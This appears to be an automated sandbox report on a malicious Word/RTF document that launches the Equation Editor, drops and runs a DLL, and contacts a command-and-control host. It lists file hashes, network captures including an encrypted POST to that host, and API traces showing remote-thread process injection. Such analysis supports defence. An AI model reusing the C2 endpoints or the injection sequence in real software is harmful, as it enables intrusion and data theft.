File Type:PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes):72704
Entropy (8bit):7.792067824152349
Encrypted:false
MD5:CD36BBD7F949CF017EDBA0E6AAADF28C
SHA1:2FDE32F2695BC7B3B702A1E3B53A8C38E60B7402
SHA-256:6DC2A49D58DC568944FEF8285AD7A03B772B9BDF1FE4BDDFF3F1ADE3862EAE79
SHA-512:37C99E8FF71C6FF4FFBE39F0358E019379094D75C5B0C7E7837C783134704369C860B22AE2EE0346692FFF44738F592CFAAA050C4BF649D7F661964BC1F252B5
Malicious:true
Reputation:low
C:\Users\user~1\AppData\Local\Temp\a.b:Zone.Identifier
File Type:ASCII text, with CRLF line terminators
Size (bytes):26
Entropy (8bit):3.9500637564362093
Encrypted:false
MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1CD60.db
File Type:data
Size (bytes):1234
Entropy (8bit):7.673826510159546
Encrypted:false
MD5:1DDCBB5BE7004A9C3D60E6EA201EC6BF
SHA1:B76B1345B5863020D49913A5DDFC9104275D4E02
SHA-256:DBDDA9E664A2F00F69F618B41A50F0DEE1380A6A1251AAAEC4A071147BDD85E8
SHA-512:4B846E55A4ACD6486707087DD527468EE69B3CF74BD7FE9D0EB0EEB6AE9CA663D4FCEDB107E256B0C8B34A05BFBC59CF1A3564EF96E5AE6264D39C1EB3C75A40
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\35883A03.emf
File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
Size (bytes):4952
Entropy (8bit):3.5299498766178474
Encrypted:false
MD5:76A6A9E9C48C004024044BCE75D37E51
SHA1:4C00770A39340B2A048510A0950634831A05D5B1
SHA-256:4F8B5CF21952829BAC2C984A04B8C842ED1E410D66A399E4EDBA08F12518DA00
SHA-512:6C465F047EFA3CCC419DF87DCF6F3A29DEA5C16C0F922B13F637987D9914F7897735D6930CCD950127E229BDE384C1660A3670EA706473A82CCEC2E075E7AC70
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{A0D9A712-568D-40D0-B7F6-6A85F1374384}.tmp
File Type:Microsoft Word Document
Size (bytes):4096
Entropy (8bit):2.0923481278854603
Encrypted:false
MD5:92086E57A2606B48530BD480E4433466
SHA1:7846DDC450B391B6C8CFB816C809E6456C7082A1
SHA-256:8D758651DD164E0528775ED8F4A639E8BE4432CF862D346043CCD012FADFB22F
SHA-512:BA7F634EDF1FB4849590103703A52CBF5474C27695D347BF1AE46809B5403B76C8E4248B0C0E9E9B4E055179392B6AA8865E7A93774D1C15B3E087CA334F4F18
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{16571D6F-8073-4493-9B1A-D2C4FF082D62}.tmp
File Type:data
Size (bytes):1024
Entropy (8bit):0.05390218305374581
Encrypted:false
MD5:5D4D94EE7E06BBB0AF9584119797B23A
SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{22A100BA-EC67-445B-87C8-9798062FBA4F}.tmp
File Type:data
Size (bytes):17162
Entropy (8bit):3.885473232990777
Encrypted:false
MD5:DEF82BC50419BEA3579CE03222140012
SHA1:6140A77DA25681CB99C87FC6F64DB4871CA8D97C
SHA-256:D80AA9834FBB4564C928BB46C06FD6258DF3DAE1F6977C6DEAA08BFB9228C498
SHA-512:68231D80CB4A2C7DC0F0E0A28AD5F2C5FFA200E38B1ADF7FD196018424768C0460638F0E4F3D8E16B60020839D324BCB012891F58177876A4945B1CDD90C2446
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\DoNotOpen2.LNK
File Type:MS Windows shortcut
Size (bytes):2066
Entropy (8bit):4.571699609436004
Encrypted:false
MD5:AB3ECA74AF0ED11F094BE0571FE5F06B
SHA1:74597A880CA352A5AF0A8B6B9C4BEED26E676F32
SHA-256:31A8A67BBC167FE4C7CC81DE2F66A4825C22DFE5C7E631C924C35542141A9DF9
SHA-512:6AF53713B731666836042EA1BB301D9C3FDC98BC3EB3DFA468F5A2605E005D2E048B331BC5E09FD62688DF2987370C35861999A2AE27FA1A63BCCBF599F4AF96
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
File Type:ASCII text, with CRLF line terminators
Size (bytes):54
Entropy (8bit):4.416653011302537
Encrypted:false
MD5:95E7739FE75359E97BD88812A26D19B6
SHA1:E6AAC3EF7260591E2AB3ABA6C47541C2BC39D9DE
SHA-256:C842AE68D3CEBFB0E8AEAEF9547AF8A8C5D235BDD39E8383695880F50352E824
SHA-512:DA9CB469DE47C83A41322130584708E24C76E81259F7E5C9DF08F061882F9C5C8105F7A59D97ED6D3176EA087A7E4553700CAB0DF1368E0868C9EA23C9E4195F
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
File Type:data
Size (bytes):162
Entropy (8bit):3.020922996257724
Encrypted:false
MD5:FFCBCAB394CED9465D4D47DA6DDDAD73
SHA1:E4E8220021519959D56383BE9F0DAAB4419B106B
SHA-256:0F219C83F79A184F98D27BADD94BC48A8025B49A7E62A28B67FDBE27AB229AB5
SHA-512:0A182F9A4A8686F25CD40723186E8BD2C7FA86C87D88F10FAD74040E122E37905538FEB7951C374AA982B793C08F85D28B91F0DF6787F684F8BAB8B4189E4025
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Windows\Caches\NavShExt.dll
File Type:PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes):72704
Entropy (8bit):7.792067824152349
Encrypted:false
MD5:CD36BBD7F949CF017EDBA0E6AAADF28C
SHA1:2FDE32F2695BC7B3B702A1E3B53A8C38E60B7402
SHA-256:6DC2A49D58DC568944FEF8285AD7A03B772B9BDF1FE4BDDFF3F1ADE3862EAE79
SHA-512:37C99E8FF71C6FF4FFBE39F0358E019379094D75C5B0C7E7837C783134704369C860B22AE2EE0346692FFF44738F592CFAAA050C4BF649D7F661964BC1F252B5
Malicious:false
Reputation:low
C:\Users\user\Desktop\~$NotOpen2.doc
File Type:data
Size (bytes):162
Entropy (8bit):3.020922996257724
Encrypted:false
MD5:FFCBCAB394CED9465D4D47DA6DDDAD73
SHA1:E4E8220021519959D56383BE9F0DAAB4419B106B
SHA-256:0F219C83F79A184F98D27BADD94BC48A8025B49A7E62A28B67FDBE27AB229AB5
SHA-512:0A182F9A4A8686F25CD40723186E8BD2C7FA86C87D88F10FAD74040E122E37905538FEB7951C374AA982B793C08F85D28B91F0DF6787F684F8BAB8B4189E4025
Malicious:false
Reputation:low
\samr
File Type:GLS_BINARY_LSB_FIRST
Size (bytes):116
Entropy (8bit):4.053374040827533
Encrypted:false
MD5:080E701E8B8E2E9C68203C150AC7C6B7
SHA1:4EF041621388B805758AE1D3B122F9D364705223
SHA-256:FE129AE2A7C96708754F6F51091E6E512C9FEACA1042A1E9DB914C651FEB344D
SHA-512:C11D88B8E355B7B922B985802464B693F75BA4C2A62F9137A15842CA82F9B6B3ED13059EDC0DF1C04E7DE43719D892B4C0D22BB67BE0D57EAB368BA1BC057E79
Malicious:false
Reputation:low

Contacted Domains/Contacted IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection
api.ipaddress.com | 209.126.119.177 | true | true | -

Contacted IPs

IP | Country | ASN | ASN Name | Malicious
103.236.150.14 | Indonesia | 55664 | IDNIC-SERVERKEREN-AS-IDPTExaRekatekProsolusiID | false
209.126.119.177 | United States | 30083 | SERVER4YOU-server4youIncUS | false

Static File Info

General

File type:Rich Text Format data, version 1, unknown character set
Entropy (8bit):4.652722413777991
TrID:
  • Rich Text Format (5005/1) 55.56%
  • Rich Text Format (4004/1) 44.44%
File name:DoNotOpen2.doc
File size:261090
MD5:f12fc711529b48bcef52c5ca0a52335a
SHA1:5f89a6b2f1f38b581c65e9a1117c43a3060bfdc1
SHA256:d3fc69a9f2ae2c446434abbfbe1693ef0f81a5da0a7f39d27c80d85f4a49c411
SHA512:dcec5673653561354867fa1586a60899e4fd952fd693922aaba86c765710cd32186ca7c1d94bc364e4d384681f4f5fd1de9f2836b4cd53bef39fcb2e96dc0a51
File Content Preview:{\rtf1\adeflang1025\ansi\ansicpg936\uc2\adeff0\deff0\stshfdbch13\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe2052\themelang1033\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;

Network Behavior

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 24, 2018 19:14:59.392513037 MEZ | 56975 | 53 | 192.168.1.16 | 8.8.8.8
Jan 24, 2018 19:15:00.392843008 MEZ | 56975 | 53 | 192.168.1.16 | 8.8.8.8
Jan 24, 2018 19:15:01.468115091 MEZ | 56975 | 53 | 192.168.1.16 | 8.8.8.8
Jan 24, 2018 19:15:03.470319986 MEZ | 56975 | 53 | 192.168.1.16 | 8.8.8.8
Jan 24, 2018 19:15:07.470093012 MEZ | 56975 | 53 | 192.168.1.16 | 8.8.8.8
Jan 24, 2018 19:15:08.509563923 MEZ | 53 | 56975 | 8.8.8.8 | 192.168.1.16
Jan 24, 2018 19:15:08.509613991 MEZ | 53 | 56975 | 8.8.8.8 | 192.168.1.16
Jan 24, 2018 19:15:08.509638071 MEZ | 53 | 56975 | 8.8.8.8 | 192.168.1.16
Jan 24, 2018 19:15:08.509663105 MEZ | 53 | 56975 | 8.8.8.8 | 192.168.1.16
Jan 24, 2018 19:15:08.519042969 MEZ | 51208 | 53 | 192.168.1.16 | 8.8.8.8
Jan 24, 2018 19:15:08.983194113 MEZ | 53 | 56975 | 8.8.8.8 | 192.168.1.16
Jan 24, 2018 19:15:09.517062902 MEZ | 51208 | 53 | 192.168.1.16 | 8.8.8.8
Jan 24, 2018 19:15:09.659126043 MEZ | 53 | 51208 | 8.8.8.8 | 192.168.1.16
Jan 24, 2018 19:15:09.665558100 MEZ | 49188 | 80 | 192.168.1.16 | 209.126.119.177
Jan 24, 2018 19:15:09.665606976 MEZ | 80 | 49188 | 209.126.119.177 | 192.168.1.16
Jan 24, 2018 19:15:09.665831089 MEZ | 49188 | 80 | 192.168.1.16 | 209.126.119.177
Jan 24, 2018 19:15:09.666721106 MEZ | 49188 | 80 | 192.168.1.16 | 209.126.119.177
Jan 24, 2018 19:15:09.666749001 MEZ | 80 | 49188 | 209.126.119.177 | 192.168.1.16
Jan 24, 2018 19:15:10.673778057 MEZ | 53 | 51208 | 8.8.8.8 | 192.168.1.16
Jan 24, 2018 19:15:17.092802048 MEZ | 80 | 49188 | 209.126.119.177 | 192.168.1.16
Jan 24, 2018 19:15:17.172864914 MEZ | 49189 | 80 | 192.168.1.16 | 103.236.150.14
Jan 24, 2018 19:15:17.172935009 MEZ | 80 | 49189 | 103.236.150.14 | 192.168.1.16
Jan 24, 2018 19:15:17.173010111 MEZ | 49189 | 80 | 192.168.1.16 | 103.236.150.14
Jan 24, 2018 19:15:17.173393011 MEZ | 49189 | 80 | 192.168.1.16 | 103.236.150.14
Jan 24, 2018 19:15:17.173419952 MEZ | 80 | 49189 | 103.236.150.14 | 192.168.1.16
Jan 24, 2018 19:15:17.173904896 MEZ | 49189 | 80 | 192.168.1.16 | 103.236.150.14
Jan 24, 2018 19:15:17.173933983 MEZ | 80 | 49189 | 103.236.150.14 | 192.168.1.16
Jan 24, 2018 19:15:17.295620918 MEZ | 80 | 49188 | 209.126.119.177 | 192.168.1.16
Jan 24, 2018 19:15:17.295701981 MEZ | 49188 | 80 | 192.168.1.16 | 209.126.119.177
Jan 24, 2018 19:15:19.410465002 MEZ | 80 | 49188 | 209.126.119.177 | 192.168.1.16
Jan 24, 2018 19:15:19.410650015 MEZ | 49188 | 80 | 192.168.1.16 | 209.126.119.177
Jan 24, 2018 19:15:19.413503885 MEZ | 49188 | 80 | 192.168.1.16 | 209.126.119.177
Jan 24, 2018 19:15:19.413541079 MEZ | 80 | 49188 | 209.126.119.177 | 192.168.1.16
Jan 24, 2018 19:15:20.774741888 MEZ | 80 | 49189 | 103.236.150.14 | 192.168.1.16
Jan 24, 2018 19:15:20.775095940 MEZ | 49189 | 80 | 192.168.1.16 | 103.236.150.14
Jan 24, 2018 19:15:20.775259972 MEZ | 80 | 49189 | 103.236.150.14 | 192.168.1.16
Jan 24, 2018 19:15:20.775757074 MEZ | 49189 | 80 | 192.168.1.16 | 103.236.150.14

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 24, 2018 19:14:59.392513037 MEZ | 56975 | 53 | 192.168.1.16 | 8.8.8.8
Jan 24, 2018 19:15:00.392843008 MEZ | 56975 | 53 | 192.168.1.16 | 8.8.8.8
Jan 24, 2018 19:15:01.468115091 MEZ | 56975 | 53 | 192.168.1.16 | 8.8.8.8
Jan 24, 2018 19:15:03.470319986 MEZ | 56975 | 53 | 192.168.1.16 | 8.8.8.8
Jan 24, 2018 19:15:07.470093012 MEZ | 56975 | 53 | 192.168.1.16 | 8.8.8.8
Jan 24, 2018 19:15:08.509563923 MEZ | 53 | 56975 | 8.8.8.8 | 192.168.1.16
Jan 24, 2018 19:15:08.509613991 MEZ | 53 | 56975 | 8.8.8.8 | 192.168.1.16
Jan 24, 2018 19:15:08.509638071 MEZ | 53 | 56975 | 8.8.8.8 | 192.168.1.16
Jan 24, 2018 19:15:08.509663105 MEZ | 53 | 56975 | 8.8.8.8 | 192.168.1.16
Jan 24, 2018 19:15:08.519042969 MEZ | 51208 | 53 | 192.168.1.16 | 8.8.8.8
Jan 24, 2018 19:15:08.983194113 MEZ | 53 | 56975 | 8.8.8.8 | 192.168.1.16
Jan 24, 2018 19:15:09.517062902 MEZ | 51208 | 53 | 192.168.1.16 | 8.8.8.8
Jan 24, 2018 19:15:09.659126043 MEZ | 53 | 51208 | 8.8.8.8 | 192.168.1.16
Jan 24, 2018 19:15:10.673778057 MEZ | 53 | 51208 | 8.8.8.8 | 192.168.1.16

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 24, 2018 19:14:59.392513037 MEZ | 192.168.1.16 | 8.8.8.8 | 0xe608 | Standard query (0) | api.ipaddress.com | A (IP address) | IN (0x0001)
Jan 24, 2018 19:15:00.392843008 MEZ | 192.168.1.16 | 8.8.8.8 | 0xe608 | Standard query (0) | api.ipaddress.com | A (IP address) | IN (0x0001)
Jan 24, 2018 19:15:01.468115091 MEZ | 192.168.1.16 | 8.8.8.8 | 0xe608 | Standard query (0) | api.ipaddress.com | A (IP address) | IN (0x0001)
Jan 24, 2018 19:15:03.470319986 MEZ | 192.168.1.16 | 8.8.8.8 | 0xe608 | Standard query (0) | api.ipaddress.com | A (IP address) | IN (0x0001)
Jan 24, 2018 19:15:07.470093012 MEZ | 192.168.1.16 | 8.8.8.8 | 0xe608 | Standard query (0) | api.ipaddress.com | A (IP address) | IN (0x0001)
Jan 24, 2018 19:15:08.519042969 MEZ | 192.168.1.16 | 8.8.8.8 | 0x5ec4 | Standard query (0) | api.ipaddress.com | A (IP address) | IN (0x0001)
Jan 24, 2018 19:15:09.517062902 MEZ | 192.168.1.16 | 8.8.8.8 | 0x5ec4 | Standard query (0) | api.ipaddress.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 24, 2018 19:15:08.509563923 MEZ | 8.8.8.8 | 192.168.1.16 | 0xe608 | No error (0) | api.ipaddress.com | - | 209.126.119.177 | A (IP address) | IN (0x0001)
Jan 24, 2018 19:15:08.509613991 MEZ | 8.8.8.8 | 192.168.1.16 | 0xe608 | No error (0) | api.ipaddress.com | - | 209.126.119.177 | A (IP address) | IN (0x0001)
Jan 24, 2018 19:15:08.509638071 MEZ | 8.8.8.8 | 192.168.1.16 | 0xe608 | No error (0) | api.ipaddress.com | - | 209.126.119.177 | A (IP address) | IN (0x0001)
Jan 24, 2018 19:15:08.509663105 MEZ | 8.8.8.8 | 192.168.1.16 | 0xe608 | No error (0) | api.ipaddress.com | - | 209.126.119.177 | A (IP address) | IN (0x0001)
Jan 24, 2018 19:15:08.983194113 MEZ | 8.8.8.8 | 192.168.1.16 | 0xe608 | No error (0) | api.ipaddress.com | - | 209.126.119.177 | A (IP address) | IN (0x0001)
Jan 24, 2018 19:15:09.659126043 MEZ | 8.8.8.8 | 192.168.1.16 | 0x5ec4 | No error (0) | api.ipaddress.com | - | 209.126.119.177 | A (IP address) | IN (0x0001)
Jan 24, 2018 19:15:10.673778057 MEZ | 8.8.8.8 | 192.168.1.16 | 0x5ec4 | No error (0) | api.ipaddress.com | - | 209.126.119.177 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

  • api.ipaddress.com
  • 3.sj2xp1.paj.org

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.1.16 | 49188 | 209.126.119.177 | 80 | C:\Program Files\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Jan 24, 2018 19:15:09.666721106 MEZ | 1 | OUT | GET /myip?format=txt HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: api.ipaddress.com
Jan 24, 2018 19:15:17.092802048 MEZ | 2 | IN | HTTP/1.1 200 OK
Date: Wed, 24 Jan 2018 18:15:14 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Wed, 31 Jan 2018 18:15:14 GMT
Content-Length: 13
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Content-Type: text/plain;charset=UTF-8
Data Raw: 31 38 35 2e 32 32 30 2e 31 30 31 2e 34
Data Ascii: 185.220.101.4
Jan 24, 2018 19:15:17.295620918 MEZ | 6 | IN | HTTP/1.1 200 OK
Date: Wed, 24 Jan 2018 18:15:14 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Wed, 31 Jan 2018 18:15:14 GMT
Content-Length: 13
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Content-Type: text/plain;charset=UTF-8
Data Raw: 31 38 35 2e 32 32 30 2e 31 30 31 2e 34
Data Ascii: 185.220.101.4


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.1.16 | 49189 | 103.236.150.14 | 80 | C:\Program Files\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Jan 24, 2018 19:15:17.173393011 MEZ | 3 | OUT | POST /goix/nhbqad.asp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: application/jason,application/xml, q=0.9,*/*, q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Cookie: 339hndxz=0wEEgqeI/L2qQmlVILDcCEjSuUvCsdzViNvvozbedxbAdA==; o49jg=zWVEEy8HHngAYbc+1rE0gJkrvAStoctjYgNpv4k6Szt9NkBBW93Ico9ieReFMojFzEeoAHCYHUFDrRQsvDbgYVM2KqbYbWq/OaEJQ5mDN6c=; 5f51il=InuyYTmulipC/qjau0zml1Nu7+ym09aui/5ksuwxMGq7sY44kB6xGZGq/lwuTsKXbhsr7wKboki43IbVzk8H3Si3N/B0rCRkIuwEFKiK8ys=;
Host: 3.sj2xp1.paj.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Content-Length: 3394
Jan 24, 2018 19:15:17.173904896 MEZ | 6 | OUT | Data Raw: 40 0d 07 a2 c2 88 2c fe 8c 3a c1 4b 29 ca 60 b6 63 fd 5f 5d fc 03 1c 24 8a da 58 00 34 c0 04 1a 3d ef 18 42 3c d7 2f 17 5b 82 5d 82 df 4e 4d 57 07 35 ef ae 99 4e 42 50 81 23 cb a3 82 1a 0c 99 6a 90 1d fe 1b 59 61 1c 29 9b 36 ea d7 92 74 21 0f 1f
Data Ascii: @,:K)`c_]$X4=B</[]NMW5NBP#jYa)6t!LIvm7}vD11W(;&~K"2fMh(W*inGYs+ITFw7]zNFVlM`2>nd@%.@%rlav
Jan 24, 2018 19:15:20.774741888 MEZ | 7 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 24 Jan 2018 18:15:18 GMT
Content-Length: 0
Connection: close
Cache-Control: no-cache


System Behavior

General

Start time:19:15:14
Start date:24/01/2018
Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):false
Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\DoNotOpen2.doc
Imagebase:0x77390000
File size:1423008 bytes
MD5 hash:5D798FF0BE2A8970D932568068ACFD9D
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:low

General

Start time:19:15:16
Start date:24/01/2018
Path:C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):false
Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:0x77390000
File size:543304 bytes
MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:low

General

Start time:19:15:17
Start date:24/01/2018
Path:C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):false
Commandline:C:\Program Files\Internet Explorer\iexplore.exe
Imagebase:0x77390000
File size:815312 bytes
MD5 hash:EE79D654A04333F566DF07EBDE217928
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:low

General

Start time:19:15:18
Start date:24/01/2018
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:explorer.exe C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Caches\NavShExt.dll,Setting
Imagebase:0x77390000
File size:2972672 bytes
MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:low

General

Start time:19:15:18
Start date:24/01/2018
Path:C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):false
Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:0x77390000
File size:543304 bytes
MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:low

General

Start time:19:15:18
Start date:24/01/2018
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase:0x77390000
File size:2972672 bytes
MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:low

Disassembly

Code Analysis

    Execution Graph

    Execution Coverage:10.6%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:15.9%
    Total number of Nodes:207
    Total number of Limit Nodes:13

    Graph

    execution_graph 876 617b223d IsDebuggerPresent 877 617b2260 CreateMutexA GetLastError 876->877 883 617b2734 876->883 878 617b227e 877->878 879 617b2291 CloseHandle memset SHGetSpecialFolderPathA 877->879 878->879 882 617b2285 CloseHandle 878->882 879->883 884 617b22cd 879->884 881 617b2741 882->883 914 617b2860 883->914 905 617b2870 884->905 887 617b23ed 887->887 888 617b23f8 MultiByteToWideChar GetModuleHandleW 887->888 889 617b246b 888->889 889->889 890 617b2476 GetProcAddress 889->890 890->883 891 617b2494 CreateProcessA 890->891 891->883 892 617b24bb memset GetModuleFileNameA 891->892 893 617b24f3 892->893 893->893 894 617b254f GetProcAddress 893->894 894->883 895 617b256d GetProcAddress 894->895 895->883 897 617b25e5 VirtualAllocEx WriteProcessMemory 895->897 898 617b2625 897->898 899 617b2714 VirtualFreeEx 897->899 898->899 901 617b2631 898->901 900 617b2728 CloseHandle 899->900 900->883 901->901 902 617b268b GetProcAddress 901->902 902->883 903 617b26ad CreateRemoteThread 902->903 903->900 904 617b26cb WaitForSingleObject GetExitCodeThread CreateRemoteThread WaitForSingleObject 903->904 904->900 906 617b2881 905->906 907 617b2888 _errno 905->907 906->907 909 617b28aa 906->909 912 617b28bc 906->912 908 617b2892 907->908 918 617b284f 908->918 909->907 911 617b2376 memset 911->887 912->911 913 617b28cd _errno 912->913 913->908 915 617b286b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 914->915 916 617b2868 914->916 915->881 916->881 919 617b27a9 OutputDebugStringA 918->919 920 617b2860 4 API calls 919->920 921 617b284d 920->921 921->911 993 617b2dbb 996 617b2dc7 993->996 994 617b2de7 995 617b2c34 10 API calls 998 617b2e59 995->998 996->994 996->995 996->998 997 617b2c34 10 API calls 997->994 998->994 999 617b2c34 10 API calls 998->999 1000 617b2f13 998->1000 999->1000 1000->994 1000->997 1007 617b350f 1008 617b2860 4 API calls 1007->1008 1009 617b3523 1008->1009 1010 617b2860 4 API calls 1009->1010 1011 617b352d 
1010->1011 1001 617b34d1 1002 617b2860 4 API calls 1001->1002 1003 617b34e2 1002->1003 922 617b2ee6 925 617b2bce 922->925 924 617b2ef7 926 617b2bdd _XcptFilter 925->926 927 617b2bea 925->927 926->924 927->924 1016 617b3017 1017 617b3027 1016->1017 1018 617b3022 1016->1018 1020 617b3362 1018->1020 1021 617b3387 1020->1021 1022 617b3394 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 1020->1022 1021->1022 1023 617b338b 1021->1023 1022->1023 1023->1017 1024 617b2974 1025 617b2986 1024->1025 1027 617b2994 @_EH4_CallFilterFunc@8 1024->1027 1026 617b2860 4 API calls 1025->1026 1026->1027 1028 617b202c memset 1029 617b208b 1028->1029 1029->1029 1030 617b2096 MultiByteToWideChar 1029->1030 1031 617b217e 1030->1031 1031->1031 1032 617b2189 MultiByteToWideChar 1031->1032 1044 617b1e97 1032->1044 1035 617b221f 1036 617b2860 4 API calls 1035->1036 1038 617b2232 1036->1038 1042 617b21e2 1042->1035 1043 617b2205 UnmapViewOfFile CloseHandle 1042->1043 1043->1035 1045 617b1ede 1044->1045 1045->1045 1046 617b1ee9 GetModuleHandleA 1045->1046 1047 617b1f2e 1046->1047 1047->1047 1048 617b1f39 GetProcAddress 1047->1048 1049 617b1f4c 1048->1049 1050 617b2860 4 API calls 1049->1050 1051 617b1f5f 1050->1051 1051->1035 1052 617b1176 ??2@YAPAXI memset 1051->1052 1053 617b11b4 memcpy 1052->1053 1053->1053 1054 617b11df 1053->1054 1055 617b11e8 memcpy 1054->1055 1056 617b1200 1054->1056 1055->1056 1057 617b121e ??2@YAPAXI 1056->1057 1060 617b1204 ??3@YAXPAX 1056->1060 1073 617b103a 1057->1073 1061 617b2860 4 API calls 1060->1061 1062 617b121c 1061->1062 1063 617b1276 1062->1063 1064 617b1289 1063->1064 1065 617b12a2 CreateFileMappingA MapViewOfFile 1064->1065 1066 617b12eb ??3@YAXPAX 1064->1066 1065->1066 1067 617b12c6 1065->1067 1066->1042 1088 617b14e9 memmove 1067->1088 1069 617b12cb 1092 617b1319 1069->1092 1072 617b12d9 UnmapViewOfFile CloseHandle 1072->1066 1074 617b1049 __EH_prolog3_GS 1073->1074 1075 617b1081 ??2@YAPAXI memset 
[Control-flow graph rendering, continued from the previous page: basic-block nodes 617b1009 through 617b34f8 with their edges; graph data omitted.]

    Callgraph

    • Executed
    • Not Executed
    • Opacity -> Relevance
    • Disassembly available
    [Call graph rendering: 89 function nodes, Function_617B1001 through Function_617B350F, with their call edges; graph data omitted.]

    Executed Functions

    Control-flow Graph

    APIs
    • IsDebuggerPresent.KERNEL32 ref: 617B2252
    • CreateMutexA.KERNELBASE(00000000,00000001,donotbotherme), ref: 617B226C
    • GetLastError.KERNEL32 ref: 617B2274
    • CloseHandle.KERNEL32(00000000), ref: 617B2286
    • CloseHandle.KERNEL32(00000000), ref: 617B2292
    • memset.MSVCRT ref: 617B22AB
    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000001), ref: 617B22BF
      • Part of subcall function 617B2870: _errno.MSVCRT ref: 617B2888
      • Part of subcall function 617B2870: _errno.MSVCRT ref: 617B28CF
    • memset.MSVCRT ref: 617B2380
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,0000000D,?,0000000D), ref: 617B2416
    • GetModuleHandleW.KERNEL32(?), ref: 617B2420
    • GetProcAddress.KERNEL32(?,?), ref: 617B248A
    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 617B24B1
    • memset.MSVCRT ref: 617B24CE
